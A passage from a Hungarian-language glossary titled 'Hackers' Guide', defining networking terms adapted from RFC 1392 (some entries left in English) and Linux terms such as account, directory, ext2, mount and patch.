(Mail Exchange Record) = (Levélváltó bejegyzése) Egy olyan DNS bejegyzési típus, mely jelzi, hogy egy adott domain-en mely hoszt foglalkozik a levelek kezelésével. Lásd még: Domain Name System, Electronic Mail. [Forrás: MALAMUD] 50 Hackers’ Guide N name resolution = névfelderítés Az a folyamat, mely során egy névhez hozzárendelik a hozzátartozó címet. netiquette Az elnevezés az "etiquette" szóból származik és a illedelmes hálózati viselkedéssel kapcsolatos. network = hálózat A számítógépes hálózat egy adatkommunikációs rendszer, mely különböző helyen található számítógépes rendszereket köt össze. Egy hálózat bármilyen összetételben állhat LAN-okból, MAN-okból és WAN-okból. Lásd még: Local Area Network, Wide Area Network, internet. NFS(R) A Sun Microsystems által kifejlesztett és az 1049-es RFC-ben leírt protokoll, mely lehetővé teszi egy számítógépes rendszer számára, hogy a hálózaton

keresztül úgy érjen el file-okat, mintha azok egy helyi lemezen lennének. Ezt a protokollt több mint kétszáz cég használta fel termékeiben, s mostanra tulajdonképpen egy internetes szabvánnyá vált. [Forrás: NNSC] NIC (Network Information Center) = Hálózati Információs Központ A NIC információt szolgáltat és segítséget nyújt a hálózat felhasználóinak. NIS (Network Information Services) = Hálózati Információs Szolgálatok Szolgálatok egy csoportja, melyet gyakran a NIC kínál fel a hálózat felhasználóinak. Lásd még: Network Information Center NNTP (Network News Transfer Protocol) = Hálózati Hírtovábbítási Protokoll A 977-es RFC-ben leírt protokoll, mely a hírek terjesztésére, kérésére és beszerzésére használatos. Lásd még: Usenet node = csomópont Egy címezhető eszköz, mely egy számítógépes hálózathoz csatlakozik. Lásd még: host, router. NSF (National Science Foundation) A U.S government agency whose purpose is to

promote the advancement of science. NSF funds science researchers, scientific projects, and infrastructure to improve the quality of scientific research. The NSFNET, funded by NSF, is an essential part of academic and research communications. It is a highspeed "network of networks" which is hierarchical in nature. At the highest level, it is a backbone network currently comprising 16 nodes connected to a 45Mb/s facility which spans the continental United States. Attached to that are midlevel networks and attached to the mid-levels are campus and local networks NSFNET also has connections out of the U.S to Canada, Mexico, Europe, and the Pacific Rim. The NSFNET is part of the Internet O P packet = csomag A hálózaton továbbított adat egysége. A "csomag" az egységnyi adat kifejezésére használt általános kifejezés az átviteli protokoll minden szintjén. Lásd még: datagram, frame. 51 Hackers’ Guide packet switching = csomagkapcsolás Egy

kommunikációs forma, amikor is a csomagok (üzenetek) önállóan kerülnek routolásra (vagyis önállóan választják ki az útvonalukat) a különböző hosztok között, előre felállított kommunikációs útvonal nélkül. Lásd még: connectionless. ping (Packet internet groper.) Egy program, melyet a célgépek elérhetőségének vizsgálatára használatos, még pedig úgy, hogy ICMP visszhang kéréseket küld és vár a válaszra. A kifejezést így is használják: "Pingesse meg az X hosztot, hogy elérhető-e!" [Forrás: RFC1208] port A szállítási rétegben a csomagokat portok szerint válogatják szét. Minden alkalmazás különálló porton "hallgatózik" (pl. a webszerver a 80-as porton) Lásd még: Transmission Control Protocol, User Datagram Protocol. POP (Post Office Protocol) = (POstahivatali Protokoll) Ezt a protokoll arra tervezték, hogy segítségével az egyfelhasználós gépek egy kiszolgálóról olvassák leveleiket. Három

verziója ismert: POP, POP2 és a POP3, de ezek NEM kompatibilisek egymással. Lásd még: Electronic Mail postmaster = postamester Az a személy, aki az elektronikus levelezés problémáival foglalkozik, a felhasználókkal kapcsolatos kérdésekre válaszol és más hasonló feladatokat lát el - egy adott területen belül. Lásd még: Electronic Mail [Forrás: ZEN] PPP Pontól-Pontig-Protokoll. A PPP, a SLIP utódja, a routertől-routerig és hoszttólhálózatig kapcsolat megteremtésére alkalmas szinkron és asszinkron vonalakon egyaránt. Lásd még: SLIP Prospero A distributed filesystem which provides the user with the ability to create multiple views of a single collection of files distributed across the Internet. Prospero provides a file naming system, and file access is provided by existing access methods (e.g, anonymous FTP and NFS) The Prospero protocol is also used for communication between clients and servers in the archie system. See also: anonymous FTP, archie,

archive site, Gopher, Network File System, Wide Area Information Servers. protocol = protokoll Üzenetformátumok hivatalos leírása, valamint azon szabályok összessége, melyet két számítógépnek kell követnie, hogy üzeneteiket kicserélhessék. A protokollok alacsony szinten meghatározhatják a gépek közötti interfészeket (vagyis pl. hogy milyen bitek és byte-ok menjenek a kábelen), ill magas szinten a programok közötti adatcserét (vagyis pl. két program hogyan küldje a file-okat egymásnak az Interneten). [Forrás: MALAMUD] proxy ARP The technique in which one machine, usually a router, answers ARP requests intended for another machine. By "faking" its identity, the router accepts responsibility for routing packets to the "real" destination. Proxy ARP allows a site to use a single IP address with two physical networks. Subnetting would normally be a better solution. See also: Address Resolution Protocol [Forrás: RFC1208] Q 52 Hackers’

Guide queue = sor Csomagok csoportja, melyek feldolgozásra várnak. R RARP (Reverse Address Resolution Protocol) A protocol, defined in RFC 903, which provides the reverse function of ARP. RARP maps a hardware (MAC) address to an internet address. It is used primarily by diskless nodes when they first initialize to find their internet address. See also: Address Resolution Protocol, BOOTP, internet address repeater = ismétlő Egy eszköz, amely elektromos jeleket terjeszt az egyik kábelről a másikra. Lásd még: gateway, router. RFC (Request For Comments) = (Megjegyzések kérése) Dokumentumok 1969-ben indított sorozata, mely leírja az Internet protokolljait és az azzal kapcsolatos kísérleteket. Nem mindegyik (valójában nagyon kevés) RFC ír le Internet szabványt, de minden Internet szabványt RFC-ként tesznek közzé. Az RFC dokumentumsorozat azért szokatlan, mert a szabvány-javaslatokat az Internet kutató és fejlesztő közösség terjeszti elő, saját nevében,

nem úgy mint pl. a CCITT és az ANSI szervezetek által hivatalosan felülbírált és szabványosított protokollokat. Lásd még: For Your Information. RFC 822 Az elektronikus levél üzenetek fejrészét leíró Internet szabvány. A levelezés szakértői gyakran hivatkoznak rá, mint "822-es üzenetek". Az elnevezés a 822-es RFC-ből származik (STD 11, RFC 822), mely a 822-es formátum meghatározását tartalmazza, mely korábban 733-as formátum néven volt ismert. Lásd még: Electronic Mail [Forrás: COMER] RIPE (Reseaux IP Europeenne) A TCP/IP protokollt használó európai hálózatok együttműködési szervezete. A RIPE foglalkozik többek között az IP címek elosztásával is, valamint ajánlásokat készít. rlogin A Berkeley UNIX által meghonosított szolgáltatás, mely során a felhasználó bejelentkezhet egy másik UNIX rendszerbe (ahova ilyen jogosultsága van) és ott úgy dolgozhat, mintha terminálja közvetlen kapcsolatban lenne a távoli

géppel. Hasonló a telnethez, azzal a különbséggel, hogy a felhasználói azonosítás más módon történik. route = útvonal Az az út, melyet a hálózati forgalom jár be a forrástól a célig. Az útvonal a lehetséges út is lehet egy adott hoszttól másik hosztig, vagy célig. routed Útvonal Démon. Egy program, mely 42BSD/43BSD UNIX (és azzal kompatibilis) operációs rendszereken fut és feladata az útvonalak kihírdetése egy helyi hálózaton, a RIP protokoll felhasználásával. (Ejtsd: rút-dí) Lásd még: gated. router = útválasztó 53 Hackers’ Guide Egy eszköz, mely a hálózatok közötti forgalmat továbbítja. A továbbításról a hálózati réteg információi, ill. az útválasztási tábla alapján születik döntés, gyakran útválasztási protokollok közreműködésével. RPC (Remote Procedure Call.) An easy and popular paradigm for implementing the client-server model of distributed computing. A request is sent to a remote system to

execute a designated procedure, using arguments supplied, and the result returned to the caller. There are many variations and subtleties, resulting in a variety of different RPC protocols. S SLIP (Serial Line IP) = (Soros vonaLi IP) Egy protokoll, melyet az IP soros vonalon (mint pl. telefon vonal, RS-232-es kábel) keresztüli használatára készítettek, két rendszer összeköttetésére. A SLIP meghatározása az 1055-ös RFC-ben található. Lásd még: Point-to-Point Protocol. SMTP (Simple Mail Transfer Protocol) = Egyszerű Levélátviteli Protokoll) A 10-es STD-ben és a 821-es RFC-ben leírt protokoll, melyet a számítógépek közötti elektronikus levelezés átvitelére használnak. Ez egy kiszolgálók közötti protokoll, ezért az üzenetek eléréséhez más protokollokat használnak. Lásd még: Electronic Mail, Post Office Protocol, RFC 822. SQL (Structured Query Language.) = (Strukturált Lekérdezőnyelv) Nemzetközileg szabványosított nyelv, mely a relációs

adatbázisok meghatározására és elérésére készült. stub network A stub network only carries packets to and from local hosts. Even if it has paths to more than one other network, it does not carry traffic for other networks. subnet = alhálózat A hálózat egy darabja, amely egy fizikailag különálló hálózati szegmens is lehet és amely a hálózat más részével megosztva használja ugyanazt a hálózati címet egy alhálózati számmal megkülönböztetve. Az alhálózat a hálózathoz képest olyan, mint a hálózat egy internethez képest. Lásd még: internet, network. subnet address = alhálózati cím Egy IP cím alhálózati része. Az alhálózatokra osztott hálózatokban az IP cím hoszt része alhálózati és hoszt részre oszlik egy cím (alhálózati) maszk segítségével. Lásd még: address mask, IP address, host address T TCP (Transmission Control Protocol) = (Átvitelvezérlési protokoll) Az STD 7-ben, és a 793-as RFC-ben leírt Internet szabvány

protokoll. Az UDP-vel ellentétben kapcsolat-orientált és stream-orientált. Lásd még: User Datagram Protocol. TCP/IP Protocol Suite Átvitelvezérlési protokoll az Internet protokoll felett. Egy megszokott rövidítés, amely az IP felett futó szállítási és alkalmazási protokollokra vonatkozik. Lásd még: IP, ICMP, TCP, UDP, FTP, Telnet, SMTP. 54 Hackers’ Guide Telnet A telnet a távoli terminálkapcsolati szolgálatok Internet szabvány protokollja. Leírása megtalálható az STD 8-ban és a 854-es RFC-ben, de további kiterjesztések találhatók más RFC-kben is. terminal emulator Egy program, mely egy számítógép számára lehetővé teszi, hogy valamilyen terminált emuláljon. A munkaállomás épp ezért egy távoli hoszt termináljának tűnik. [Forrás: MALAMUD] terminal server = terminál kiszolgáló Egy eszköz, mely sok terminált kapcsol egy LAN-hoz egyetlen hálózati csatlakozáson keresztül. A terminál kiszolgáló sok hálózati

felhasználót is kapcsolhat aszinkron portjaihoz telefonos kapcsolatok létesítésére, ill. nyomtatók elérésére. Lásd még: Local Area Network TN3270 A telnet program egy változata, melyet az IBM mainframe-ekhez történő csatlakozást teszi lehetővé, valamint azt, hogy úgy használjunk egy mainframe-et, mintha 3270-es, vagy ehhez hasonló terminálunk lenne. [Forrás: BIG-LAN] topology = topológia A hálózati topológia megmutatja, hogy a számítógépek hogyan helyezkednek el és milyen összeköttetések vannak közöttük. A hálózati rétegnek lépést kell tartania a mindenkori hálózati topológiával, hogy képes legyen csomagokat a végső célpontba eljuttatni. [Forrás: MALAMUD] Trojan Horse = Trójai faló Egy számítógépes program, melynek létrehozója olyan lehetőségeket rejtett el benne, melyek segítségével bármely rendszert el tud érni, ahol e program fut. Lásd még: virus, worm. See RFC 1135 U UDP (User Datagram Protocol) = (felhasználói

datagramprotokoll) Internet szabványos szállítási réteg protokoll, melynek leírása az STD 6-ban és a 768-as RFC-ben található meg. Kapcsolatmentes protokoll, mely tulajdonképpen az Internet Protokoll felhasználói interfésze. Lásd még: connectionless, Transmission Control Protocol. Usenet Több ezer téma szerint megnevezett hírcsoport, a protokollokat futtató számítógépek és a Usenet híreket olvasó és küldő emberek összessége. Nem minden hoszt vesz részt a Usenetben és nem minden Usenet hoszt található az Interneten. Lásd még: Network News Transfer Protocol, UNIX-to-UNIX CoPy. [Forrás: NWNET] UUCP (UNIX-to-UNIX CoPy) This was initially a program run under the UNIX operating system that allowed one UNIX system to send files to another UNIX system via dial-up phone lines. Today, the term is more commonly used to describe the large international network which uses the UUCP protocol to pass news and electronic mail. See also: Electronic Mail, Usenet V

55 Hackers’ Guide virus Egy program, ami saját magát terjeszti azzal, hogy számítógépes rendszerek között megosztott programokba ágyazódik. Lásd még: Trojan Horse, worm W WAM (Wide Area Network) Egy olyan hálózat, mely többnyire soros vonalakból áll és nagyobb földrajzi területet fed le. Lásd még: Local Area Network World Wide Web (WWW or W3) = Világméretű háló Egy hypertext alapú, terjesztett információs rendszer, melyet a CERN kutatói hoztak létre svájcban. A felhasználók létrehozhatják, szerkeszthetik, vagy böngészhetik a hypertext dokumentumokat. worm = féreg Egy számítógépes program, mely sajátmagát másolja és terjeszti. A férgeket, a vírusokkal ellentétben hálózati környezetre tervezték. A hálózati féreg kifejezést Shoch & Hupp használta előszőr 1982 márciusában. A leghíresebb internetes féreg 1988 novemberében szabadult el: sikeresen terjesztette el magát kb. 6 ezer internetes hálózaton Lásd még:

Trojan Horse, virus WYSIWYG What You See is What You Get = Amit látsz, azt kapod (például szövegszerkesztőknél, ahol az fog a papíron is szerepelni nyomtatás után, mint amit a képernyőn látunk). X X (The X Window System) X-nek nevezik ezt a TCP/IP alapú, hálózatra kifejlesztett grafikus felületet. A hálózati ablakozó-rendszer lehetőséget nyújt egy program számára, hogy egy másik számítógép képernyőjét használja. Széles körben elterjedt megvalósítása az X11 (mint a MIT Athena projektjének egy része). Y Z References BIG-LAN "BIG-LAN Frequently Asked Questions Memo", BIG-LAN DIGEST V4:I8, February 14, 1992. COMER Comer, D., "Internetworking with TCP/IP: Principles, Protocols and Architecture", Prentice Hall, Englewood Cliffs, NJ, 1991. FYI4 Malkin, G., and A Marine, "FYI on Questions and Answers: Answers to Commonly asked "New Internet User" Questions", FYI 4, RFC 1325, Xylogics, SRI, May 1992. HACKER 56

Hackers’ Guide "THIS IS THE JARGON FILE", Version 2.98, January 1992 HPCC "Grand Challenges 1993: High Performance Computing and Communications", Committee on Physical, Mathmatical and Engineering Sciences of the Federal Coordinating Council for Science, Engineering and Technology. MALAMUD Malamud, C., "Analyzing Sun Networks", Van Nostrand Reinhold, New York, NY, 1992. NNSC "NNSCs Hypercard Tour of the Internet". LAQUEY LaQuey, T. (with J Ryer), "The Internet Companion: A Beginners Guide to Global Networking", Addison-Wesley, Reading, MA, 1992. NWNET Kochmer, J., and NorthWestNet, "The Internet Passport: NorthWestNets Guide to Our World Online", NorthWestNet, Bellevue, WA, 1992. RFC1208 Jacobsen, O., and D Lynch, "A Glossary of Networking Terms", RFC 1208, Interop, Inc., March 1991 STD1 Postel, J., "IAB Official Protocol Standards", STD 1, RFC 1360, Internet Architecture Board, September 1992. STD2

Reynolds, J., and J Postel, "Assigned Numbers", STD 2, RFC 1340, USC/Information Sciences Institute, July 1992. TAN Tanenbaum, A., "Computer Networks; 2nd ed", Prentice Hall, Englewood Cliffs, NJ, 1989. ZEN Kehoe, B., "Zen and the Art of the Internet", February 1992 Az eredeti RFC #1392 alkotói: Gary Scott Malkin Xylogics, Inc. 53 Third Avenue Burlington, MA 01803 Phone: (617) 272-8140 EMail: gmalkin@Xylogics.COM Tracy LaQuey Parker University of Texas at Austin Computation Center Austin, TX 78712 Phone: (512) 471-2444 EMail: tracy@utexas.edu 57 Hackers’ Guide * Eredeti Linux Kisszótár Vörösbaranyi Zoltán (vbzoli@tarki.hu) "Terminológia" című műve alapján a köz javára. [A] [B] [C] [D] [E] [F] [G] [H] [I] [J] [K] [L] [M] [N] [O] [P] [Q] [R] [S] [T] [U] [V] [W] [X] [Y] [Z] {A} account = felhasználói hozzáférés, terület Az internetes kiszolgaló gépeken miden felhasznaló rendelkezik internet account-al, mely magában

foglal egy saját, ún. HOME könyvtárat, egy elektonikus levelezési címet (e-mail), ill. különböző szolgáltatásokhoz biztosít különféle elérési jogokat. A hagyományos felhasználói hozzáférés a legtöbb program elindítását lehetővé teszi, s a legtöbb helyre "bejárást enged". A vendég hozzáférés (guest account) csak meglehetősen lekorlátozott elérést engedélyez, míg a "root" hozzáférés "isteni" jogokat ad, mivel a root a renszer gazdája. {B} {C} {D} device = eszköz A különböző hardveres kiegészítőket nevezik eszközöknek. Ilyen eszköz, pl a modem, vagy a hangkártya. Az eszközök szoftveres lekezelésére léteznek a device driver-ek. directory = könyvtár (vagy file-tár?) File-ok, vagy további könyvtárak csoportját hívják könyvtárnak. A könyvtárak általában file-okat foglalnak magukba, így segítve azok könnyebb csoportosítását. Egy könyvtárban a file-ok mellett további

könyvtárak is lehetnek, melyekben ugyancsak további file-ok, vagy könyvtárak szerepelhetnek. Ez úgy néz ki, mint ahogy a fa ágai indulnak ki a törzsből és egymásból. Ezért is nevezik a főkönyvtárat gyökér-nek (root), a könyvtárszerkezetet pedig faág-struktúrának. Végül egy gyakorlati példa: Szeretnénk ha a játékprogramok és hozzájuk tartozó dolgok olyan helyen lennének, ahol elkülönülve találhatnánk rájuk. Botorság lenne minden programot és annak minden file-ját a "gyökérbe" rakni, 58 Hackers’ Guide mert akkor nehezen különböztethetnénk meg mi mihez tartozik. Készítünk tehát egy /games/ könyvárat. Így már közelebb jutottunk a célhoz, mert elkülönítettük a játékokat a többi programtól. Hogyan válaszuk el tehát a játékok file-jait egymástól? Minden játéknak készítünk saját könyvtárat, pl.: /games/doom/ vagy /games/GrawityWars. Így ezek után ha keressük a DOOM dolgait, azt mindig

/games/doom/-ban találjuk meg. A /games/ könyvtár tartozhat más könyvtár alá is, mint pl. a /usr/, s akkor a DOOM a /usr/games/doom könyvtárban lesz. disk image = lemezlenyomat A floppy lemez teljes tartalma, a könyvtár-struktúrával, a floppy filerendszerének összes adatával együtt tárolásra kerül egyetlen file-ba. Ez a lemezlenyomat. Mire jó egy ilyen file? A Linux-os terjesztésekhez adnak pl ilyen lenyomatokat. Egy "üres", operációs rendszer nélküli gépre csak floppyról lehet "bebootolni", vagy esetleg valamilyen EPROM-ba írt program segítségével hálózatról. Ha van a gépünkön MS-DOS, vagy van a közelünkben valamilyen másik működő gép, akkor az alatt elkészíthető a kívánt bootlemez, úgy hogy a terjesztésben található lemezlenyomatot felírjuk egy üres floppy-ra. distribution = terjesztés A Linux (és más hasonló ingyenes) operációs rendszert ú.n "terjesztésekkel" a legegyszerűbb gépünkre

vinni. Ebben ugyanis már előre összeállították a rendszer működéséhez szükséges összes file-t. A terjesztések rendelkeznek telepítő programokkal, amelyek létrehozzák az összes szükséges könyvtárat, s elhelyezik bennük az odavaló file-okat (programokat). drive = meghajtó A különböző lemez, vagy szalag típusok kezelésére alkalmas eszközöket nevezik meghajtónak. Ilyen például a floppy meghajtó (floppy drive), a HDD vagy keménylemezes meghajtó, vagy a CD-ROM. Nem tévesztendő össze az eszköz meghajtóval (device driver), mely inkább szoftver, mint hardver. {E} ext2 = ext2 (Second Extended Filesystem) A Linux-os operációs rendszerek saját file-rendszere, melyet eredetileg Linus Torvalds fejlesztett ki a minix file-rendszert követve. Az ext2 egy gyors és megbízható rendszernek bizonyult a többi UNIX-os rendszerekhez képest is. Támogatja a hosszú file-neveket, a biztonsági jelzőket, a jelképes kötéseket, különbséget tesz a kis

és nagy betűk között. Hátránya, hogy a 2GB-nál nagyob file-okat egyelőre nem támogatja. ;-) {F} file = fájl, állomány ??? (a magyar fordítása meglehetősen vitatott) A file-ok adatok gyűjteményei. Egy file lehet szöveges, s ekkor "ember számára" is olvasható formában találhatóak benne adatok, szövegek, de a file tartalmazhat egy programot is, s akkor az futtatható file, de létezik tömörített file is, amikor az adatok sűrítve lettek eltárolva benne, s még ki tudja hány féle file-fajta létezik. filesytem = filerendszer vagy fájlrendszer A file-ok (beleértve a könyvtárakat) valamilyen rend szerint kerülnek tárolásra. Hatalmas tárolófelületek léteznek már, melyeken nehezen lehetne megtalálni a kívánt file-t, ha nem tudnánk, hogy merre keressük, hogy hol kezdodik, hol végződik, hova tartozik, milyen fajta file. A file-ok tárolását határozzák meg a 59 Hackers’ Guide filerendszerek, melyek meglehetősen eltérőek

lehetnek egymástól. Pl van amelyik hosszabb neveket enged meg, van amelyik csak rövidet, változó lehet a file-ok által elfoglalt legkisebb egység mérete, változó lehet, hogy a file-ok hogy kerülnek bejegyzésre, hogyan rendelődnek egymáshoz, stb. A Linux által kedvelt filerendszer típusa az ext2, de maga a Linux több féle filerendszert tud kezelni. FTP = File Transfer Protocol = File átviteli protokoll Olyan protokoll (meghatározott eljárás), melynek során egy távoli gépről fileokat hozunk el, vagy teszük fel oda (természetesen anélkül, hogy a file-ok eredetijét letörölnénk). A file-ok változtatás nélkül jutnak el hozzánk ellentétben a HTTP-vel. FTP site = FTP-hely (lelőhely) Az a hely, ahol sok-sok file-t gyűjtöttek össze azzal a céllal, hogy azokat vagy a felhasználók egy bizonyos köre, vagy az összes felhasználó elérhesse, azt saját gépére áttölthesse. A FTP-helyek célja különböző lehet: van, ahol csak egyetlen operációs

rendszerhez szükséges programok, vagy maga az operációs rendszer található (ez utóbbi meglehetősen ritka, s inkább csak a Linux-ra, no meg a FreeBSD-re jellemző), aztán van, ahol mindenféle rendszerre van mindenféle program és van rengeteg egyéb file, mint például: képek, hangok, animációk és van olyan FTP-hely is, ahol csak egyetlen szoftvernek találhatóak meg a különféle dolgai, ezek általában fejlesztői helyek is. {G} gateway = átjáró Gateway, azaz átjáró alatt több mindent érthetünk. A TCP/IP hálózatokban (v.i: Interneten) az átjáró egy olyan kiszolgáló gép, amely két, vagy több helyi hálózat között biztosít összeköttetést egymással, ill. az Internet többi részével Ha adatot küldünk valamely hálózatba, mely nem a mi hálózatunkon van, akkor az az adat akár 10-20 átjárón is keresztül mehet, mire eléri a célállomást. Átjáró létezhet nem Internetes hálózatok felé is, ill két szolgáltatás között is:

pl. usenet hírcsoportok és levelezési listák között gid (group identifier) = csoportazonosító Minden kiszolgáló gépen a felhasználók különböző csoportokba tartoznak, s minden csoportnak van neve, ill. száma A rendszer a gid alapján dönti el, hogy melyik file, melyik csoporthoz tartozik (és ennek megfelelően a felhasználók mely csoportja érheti el vagy módosíthatja). {H} hacker = bányász, "buherátor" ??? Olyan személyek a hackerek, akik programok forráskódját, vagy rendszerek felépítését vizsgálják, s azokat különböző céllal megváltoztatják, ill. kiegészítik. Ezek a hackerek "építgetik" pl magát a Linux operációs rendszert, ill. a kiegészítő programokat is hard disk = kemény lemez vagy merevlemez Több merev lemezecskéből álló mágneses háttértár a "hard disk drive", vagy merevlemezes meghajó (HDD). Manapság már szinte minden számítógép ezt használja háttértárként, mert jelenleg ez

a legolcsóbb írható-olvasható ilyen eszköz. home directory = honkönyvtár 60 Hackers’ Guide Az a könyvtár, mely egy felhasznála sajátja. Bejelentjezés után ez a könyvtár lesz a kiindulópontja, alapértelmezésben ide dologozik, itt vanak a saját programjai, saját konfigurációs file-jai, itt tárolja leveleit és ide tölti le a programokat a hálózatról. A felhasználó honkönyvtárjában úgy rendezi a fileokat, könyvtárstruktúrát ahogy kívánja, viszont más felhasználó ide nem írhat, innen nem törölhet. homepage = honlap vagy címlap, ottlap A World Wide Web-en egy olyan oldal, lap, mely valakinek, vagy valakiknek a saját "kiinduló helye". Honlapja lehet egy magánszemélynek, melyen e személyről tudhatunk meg részleteket (mindent, amit magáról elárul, pl. hobbija, munkája), ill. lehet egy cégnek vagy társulásnak, vagy valamilyen rajongói tábornak, hasonló érdeklődésű embereknek. A GENERATIONS pl a Generations

projekt honlapja, mely egyben a szerzőé is. hostname = gépnév vagy gazdanév Az Interneten a hálózati kiszolgáló, vagy kliensgépeknek külön-külön saját nevük van. A teljes értékű neveknek (FQDN, Fully Qualified Domain Name) megkülönböztetjük a "domain" és a host részét. Például az arnicadatanethu nevezetű gépnek a host része az arnica és a domain része datanet.hu, ennek megfelelően ennek a gépnek arnica a gépneve. Különböző domain-eken lehetnek ugyanolyan nevű gépek is. HOWTO = kotta vagy hogyan A howto-k olyan leírások, melyekben egyes témakörök részletesen ismertetve találhatóak. Pl: PPP-HOWTO leírja a PPP kapcsolat létesítésének elveit, feltételeit és módját. A "hogyan" fordítás Vörösbaranyi Zoltántól származik, aki megalkotta a Magyarul-HOGYAN nevezetű dokumentumot, mely a Linux magyar környezetben történő használatáról szól. HTML = HyperText Markup Language = HyperText leírónyelv Olyan

különleges nyelv, mely a WWW böngésző számára leírja, hogy miképp jelenítse meg a leírt WWW oldalt. A HTML erre különböző elemeket tartalmaz, melyek meghatározzák a megjelenítendő szöveg tulajdonságait, mint pl. vastagságát, méretét, szinét, elhelyezkedését, ill. meghatározzák az egyes multi-médiás elemek elhelyezkedését, mint pl. a képek, hangok, animációk Természetesen a HTML tartalmazza a megjelenítendő szöveg nagy részét is. A HTML legfontosabb tulajdonsága, hogy a szövegben lehetővé teszi a kereszt-utalások használatát, azaz egy aláhúzással kiemelt szövegrészlet a szövegen belül máshová, ill. akár a világhálózaton belül akármelyik gépen elhelyezkedő szövegre utalhat!!! Eme nagyszerű lehetőség vezetett a WWW kialakulásához. A HTML újabban már egy másik leírónyelvet, a JAVA-t is magában foglalhatja, ill. folyamatos fejlődése során újabb és újabb lehetőségeket biztosít a HTML-ek alkotóinak, ill.

a WWW oldalak olvasóinak Ez a hipermédia. HTTP = HyperText Transfer Protocol = HyperText átviteli protokoll Olyan átviteli eljárás, melynek során a HTML file-okat a WWW szerver kiadja a kliensnek. A HTML file-ban lehetnek utalások más file-okra is, melyeket esetleg a kért HTML file-lal együtt kell kiadni. Ezek lehetnek képek, hangok, animációk, vagy akár egyszerű szövegfile-ok. {I} install = telepít(és) vagy installál(ás) Hardverek üzembehelyezése, szoftverek, operációs rendszerek géprevitele, működőképessé tétele. 61 Hackers’ Guide interface = illesztő vagy csatoló Olyan eszköz, melynek segítségével hardveresen vagy szoftveresen más hardverekhez, vagy szoftverekhez lehet kapcsolódni. Ilyen illesztő lehet pl más-más elvek szerint működő hardver elemek, vagy más protokollt követő szoftverek között. interrupt = megszakítás A hardveres kéréseket megszakításokra időzítik, így a különböző hardveres eszközök

meghatározott időközökben jutnak hozzá a géphez (a processzorhoz), elkerülve ezzel a hardverkonfliktusokat. {J} JAVA = JAVA ? Olyan programozási nyelv, mely a HTML forrásokban jut el a WWW böngészőhöz, s ott futó alkalmazásként "éli tovább életét". Ezzel nem csak pl statikus képeket küldhetünk a klienshez, hanem mondjuk egy olyan ábrát, mely az cselekedetei alapján más és más formát vesz fel. JAVA nyelven küldhetünk kisebb játékokat is. A JAVA programozási láz nem olyan régen kezdődött, de már minden jelentősebb WWW-helyen található legalább a címoldalon valamilyen JAVA alkalmazás. A legtöbb esetben ez egy grafikus menü, amely akár "mókásan" is viselkedhet, választásunknak megfelelően átalakulhat, kis animációk lehetnek benne. job = feladat(sor) A felhasználó, vagy rendszergazda által meghatározott feladat(sor). Az elvégezendő feladatokat, utasításokat a feladatvezérlés (job control) különböző

eszközeivel lehet irányítani. Egy programot elindíthatunk pl a háttérben (anélkül fut, hogy bármit kijelezne a képernyőre), miközben másik programot is használhatunk, leállíthatunk, újraindíthatunk, vagy eltehetjük a háttérbe. A cron segítségével a feladatokat meghatározott időpontokban is végeztethetjük. {K} kernel = rendszermag vagy mag Az operációs rendszernek az a része, mely megteremti a hardverelemek és a szoftverek közti összeköttetést. A Linux rendszermag esetében az egyes hardverösszetevők (mint pl. a keménylemezes meghajtó, hangkártya, cd-rom) csak azon keresztül érhetőek el. A szoftverek kéréseit a rendszermagba ágyazott meghajók teljesítik. {L} library = eljáráskönyvtár vagy eljárásgyűjtemény Olyan eljárások gyűjteménye, melyeket különböző szoftverek használnak, hívnak meg. Az eljáráskönyvtár segítségével a már létező eljárásokat nem kell a programozóknak újra és újra megírniuk, mert ezek -

többnyire - szabványos formában léteznek. link = mutató vagy kötés A link kifejezésnek több jelentése is lehet. A hypertext dokumentumokban találhatók "érzékeny részek" mutatók más domumentumokra, vagy file-okra. Az ext2 filerendszerben található kötések segítségével file-okat köthetünk össze. login = bejelentkezés 62 Hackers’ Guide Amikor a Linux (UNIX) operációs rendszerű gépeket konzolról, vagy Xterminálról használni szeretnénk be kell jelentkeznünk (loggolnunk), hogy a rendszer eldönthesse kilétünket és jogainkat file-okhoz, ill. utasításokhoz Természetesen az sem kizárt, hogy a rendszeren kívül valamely más program is kér tőlünk bejelentkezést. {M} manual = leírás vagy kézikönyv A Linux (UNIX) operációs rendszerekben többnyire minden parancshoz, konfigurációs file-hoz "jár" egy leírás, vagy kézikönyv, mely tartalmazza, hogy az adott parancs mire használható és hogyan. Például ha

kíváncsiak vagyuk arra, hogy az "echo" parancs mire képes, milyen kapcsolókat fogad el, akkor egy parancssornál be kell írnunk, hogy "man echo" és máris megkapjuk az echo parancs több oldalas leírását. modul = modul A meghajtók a Linux rendszermagba ágyazódnak be. Amennyiben saját hardverünknek és igényeinknek megfelelő rendszermagot fordítunk előfordulhat, hogy a már futó renndszer nem támogat néhány dolgot, melyre épp szükségünk lenne. Ilyenkor jönnek jól a modulok Ezeket mindig az adott rendszermaghoz kell fordítani, s szükség esetén be lehet tölteni a magba, ill. ki lehet onnan venni. Gyakorlati példa: tegyük fel, hogy van egy AMIGA számítógépeket használó ismerősünk. Az affs (amiga filesystem) támogatást nem fordítottuk bele a rendszermagba, de elkészítettük modulként. Ismerősünk meghozza a keménylemezes meghajtóját, mi betöltjük az affs modult és máris tudjuk olvasni az adatokat. mount =

beszerel(és) vagy beilleszt(és) A fizikai értelemben vett szerelésen kívül a mount file-rendszerek beillesztését jelenti. A Linux (UNIX) operációs rendszer behúzás (boot) után az ún root file-rendszert mount-olja először. Ez szükséges a rendszer futtatásához Később újabb és újabb file-rendszerek illeszhetők be, ill. távolíthatók el A floppy meghajtóban található lemez valamilyen file-rendszert hordoz, mely valószínűleg csak az írás-olvasás idejére kerül beillesztésre, majd kikerül onnan, ha a lemezt el akarják távolítani. File-rendszert hálózaton keresztül is beilleszthetünk a rendszerbe, ennek a neve az NFS. {N} {O} {P} patch = folt A foltok általában két forráskód közötti különbségeket tartalmazzák. Ez egyrészről azért lehet jó, mert egy adott program újabb verziójának megjelenése esetén nem szükséges az új verzió teljes forráskódját ismét letölteni, hiszen a szükséges változtatásokat a foltok

